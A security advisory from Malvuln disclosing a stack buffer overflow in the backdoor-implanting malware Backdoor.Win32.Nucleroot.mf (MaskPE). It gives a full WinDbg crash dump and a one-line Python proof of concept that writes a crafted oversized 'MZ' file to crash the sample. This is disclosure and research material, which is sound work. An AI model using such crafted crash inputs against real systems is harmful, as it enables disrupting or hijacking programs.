Backdoor.Win32.Nucleroot.mf Buffer Overflow

Backdoor.Win32.Nucleroot.mf malware suffers from a buffer overflow vulnerability.


MD5 | 5a89c60363d5b28a54c9a03dec1107f1

Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt
Contact: [email protected]
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Nucleroot.mf
Vulnerability: Stack Buffer Overflow
Description: Description: MaskPE by yzkzero is a tool for implanting backdoors in existing PE files. The Backdoor tool doesnt properly check the files it loads and falls victim to a file based local buffer overflow.
Type: PE32
MD5: 8de56eef118187a89eeab972288ce94d
Vuln ID: MVID-2021-0420
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 12/11/2021

Memory Dump:
(1790.60): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003 edi=00000003
eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
ntdll!ZwWaitForMultipleObjects+0xc:
7770ed3c c21400 ret 14h

0:000> .ecxr
eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8
eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
*** WARNING: Unable to verify checksum for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d
Backdoor_Win32_Nucleroot_mf+0x90e3:
004090e3 813850450000 cmp dword ptr [eax],4550h ds:002b:454e4141=????????

0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************


FAULTING_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550h

EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: 454e4141
Attempt to read from address 454e4141

PROCESS_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1: 00000000

EXCEPTION_PARAMETER2: 454e4141

READ_ADDRESS: 454e4141

FOLLOWUP_IP:
Backdoor_Win32_Nucleroot_mf+90e3
004090e3 813850450000 cmp dword ptr [eax],4550h

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG: 0

APPLICATION_VERIFIER_FLAGS: 0

FAULTING_THREAD: 00000060

BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER: from 004049b2 to 004090e3

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0019f0c8 004049b2 00000001 0019fb74 0019f438 Backdoor_Win32_Nucleroot_mf+0x90e3
0019fc1c 77408654 000000b8 00000000 026a1600 Backdoor_Win32_Nucleroot_mf+0x49b2
0042fba0 00403690 004012a0 00420e01 0042167d kernel32!BaseThreadInitThunk+0x24
0042fba8 00420e01 0042167d 004255fe 0042565f Backdoor_Win32_Nucleroot_mf+0x3690
0042fbac 0042167d 004255fe 0042565f 00425604 Backdoor_Win32_Nucleroot_mf+0x20e01
0042fbb0 004255fe 0042565f 00425604 00425604 Backdoor_Win32_Nucleroot_mf+0x2167d
0042fbb4 0042565f 00425604 00425604 00425607 Backdoor_Win32_Nucleroot_mf+0x255fe
0042fbb8 00425604 00425604 00425607 004021b0 Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbbc 00425604 00425607 004021b0 00425664 Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc0 00425607 004021b0 00425664 00425615 Backdoor_Win32_Nucleroot_mf+0x25604
0042fbc4 004021b0 00425664 00425615 00425659 Backdoor_Win32_Nucleroot_mf+0x25607
0042fbc8 00425664 00425615 00425659 00421982 Backdoor_Win32_Nucleroot_mf+0x21b0
0042fbcc 00425615 00425659 00421982 0042561b Backdoor_Win32_Nucleroot_mf+0x25664
0042fbd0 00425659 00421982 0042561b 00425655 Backdoor_Win32_Nucleroot_mf+0x25615
0042fbd4 00421982 0042561b 00425655 0042565f Backdoor_Win32_Nucleroot_mf+0x25659
0042fbd8 0042561b 00425655 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x21982
0042fbdc 00425655 0042565f 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x2561b
0042fbe0 0042565f 0042565f 0042565f 00420d33 Backdoor_Win32_Nucleroot_mf+0x25655
0042fbe4 0042565f 0042565f 00420d33 00422195 Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbe8 0042565f 00420d33 00422195 0042214c Backdoor_Win32_Nucleroot_mf+0x2565f
0042fbec 00420d33 00422195 0042214c 00423e5e Backdoor_Win32_Nucleroot_mf+0x2565f
0042fcec 00420d4d 00420d33 00690053 0065007a Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf0 00420d33 00690053 0065007a 0066004f Backdoor_Win32_Nucleroot_mf+0x20d4d
0042fcf4 00690053 0065007a 0066004f 006d0049 Backdoor_Win32_Nucleroot_mf+0x20d33
0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053
0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a
0042fd00 006d0049 00670061 00000065 00610042 0x66004f
0042fd04 00670061 00000065 00610042 00650073 0x6d0049
0042fd08 00000000 00610042 00650073 0066004f 0x670061


STACK_COMMAND: ~0s; .ecxr ; kb

SYMBOL_STACK_INDEX: 0

SYMBOL_NAME: Backdoor_Win32_Nucleroot_mf+90e3

FOLLOWUP_NAME: MachineOwner

MODULE_NAME: Backdoor_Win32_Nucleroot_mf

IMAGE_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d

DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74

FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown

BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3


Exploit/PoC:
python -c "print( 'MZ'+'A'*20000)" > DOOM.exe


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Related Posts